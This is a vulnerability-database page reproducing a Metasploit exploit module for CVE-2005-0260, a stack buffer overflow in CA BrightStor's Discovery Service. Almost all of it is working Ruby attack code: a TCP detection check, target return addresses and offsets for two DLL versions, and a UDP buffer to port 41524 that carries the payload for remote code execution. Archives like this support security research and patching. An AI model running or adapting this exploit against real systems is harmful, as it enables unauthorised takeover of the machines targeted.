Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormH D MoorePACKETSTORM:83122
HistoryNov 26, 2009 - 12:00 a.m.

CA BrightStor Discovery Service Overflow

2009-11-2600:00:00
H D Moore
packetstormsecurity.com
14

0.554 Medium

EPSS

Percentile

97.3%

JSON
`##  
# $Id$  
##  
  
##  
# This file is part of the Metasploit Framework and may be subject to   
# redistribution and commercial restrictions. Please see the Metasploit  
# Framework web site for more information on licensing and terms of use.  
# http://metasploit.com/framework/  
##  
  
  
require 'msf/core'  
  
  
class Metasploit3 < Msf::Exploit::Remote  
  
include Msf::Exploit::Remote::Tcp  
include Msf::Exploit::Remote::Udp  
  
def initialize(info = {})  
super(update_info(info,   
'Name' => 'CA BrightStor Discovery Service Overflow',  
'Description' => %q{  
This module exploits a vulnerability in the CA BrightStor  
Discovery Service. This vulnerability occurs when a large  
request is sent to UDP port 41524, triggering a stack  
overflow.  
},  
'Author' => [ 'hdm', 'patrick' ],  
'License' => MSF_LICENSE,  
'Version' => '$Revision$',  
'References' =>  
[  
[ 'CVE', '2005-0260'],  
[ 'OSVDB', '13613'],  
[ 'BID', '12491'],  
[ 'URL', 'http://www.idefense.com/application/poi/display?id=194&type=vulnerabilities'],  
],  
'Privileged' => true,  
'Payload' =>  
{  
'Space' => 2048,  
'BadChars' => "\x00",  
'StackAdjustment' => -3500,  
},  
'Targets' =>   
[  
[  
'cheyprod.dll 12/12/2003',  
{  
'Platform' => 'win',  
'Ret' => 0x23808eb0, # call to edi reg  
'Offset' => 968,  
},  
],  
[  
'cheyprod.dll 07/21/2004',  
{  
'Platform' => 'win',  
'Ret' => 0x2380a908, # call edi  
'Offset' => 970,  
},  
],   
],  
'DisclosureDate' => 'Dec 20 2004',  
'DefaultTarget' => 0))  
  
register_options(  
[  
Opt::RPORT(41524)  
], self.class)   
end  
  
def check  
  
# The first request should have no reply  
csock = Rex::Socket::Tcp.create(  
'PeerHost' => datastore['RHOST'],  
'PeerPort' => 41523,  
'Context' =>  
{  
'Msf' => framework,  
'MsfExploit' => self,  
})  
  
csock.put('META')  
x = csock.get_once(-1, 3)  
csock.close  
  
# The second request should be replied with the host name  
csock = Rex::Socket::Tcp.create(  
'PeerHost' => datastore['RHOST'],  
'PeerPort' => 41523,  
'Context' =>  
{  
'Msf' => framework,  
'MsfExploit' => self,  
})  
  
csock.put('hMETA')  
y = csock.get_once(-1, 3)  
csock.close  
  
if (y and not x)  
return Exploit::CheckCode::Detected  
end  
return Exploit::CheckCode::Safe   
end  
  
def exploit  
connect_udp  
  
print_status("Trying target #{target.name}...")  
  
buf = rand_text_english(4096)  
  
# Target 0:  
#  
# esp @ 971  
# ret @ 968  
# edi @ 1046  
# end = 4092  
  
buf[target['Offset'], 4] = [ target.ret ].pack('V')  
buf[1046, payload.encoded.length] = payload.encoded  
  
udp_sock.put(buf)  
udp_sock.recvfrom(8192)  
  
handler  
disconnect_udp  
end  
  
end  
`

Related

packetstorm 1
checkpoint_advisories 1
cert 1
canvas 1
cve 2
packetstorm
packetstorm
cabrightstor_disco.pm
2005-02-18 00:00:00
checkpoint_advisories
checkpoint_advisories
CA BrightStor Discovery Service Buffer Overflow - Ver2 (CVE-2005-0260)
2018-06-25 00:00:00
cert
cert
Computer Associates BrightStor ARCserve Backup Discovery Service vulnerable to buffer overflow
2005-08-04 00:00:00
canvas
canvas
Immunity Canvas: BRIGHTSTOR_DISCOVERY
2005-05-02 04:00:00
cve
cve
CVE-2005-0260
2005-05-02 04:00:00
CVE-2005-2535
2005-08-10 04:00:00

0.554 Medium

EPSS

Percentile

97.3%

JSON
Related for PACKETSTORM:83122
packetstorm1checkpoint_advisories1cert1canvas1cve2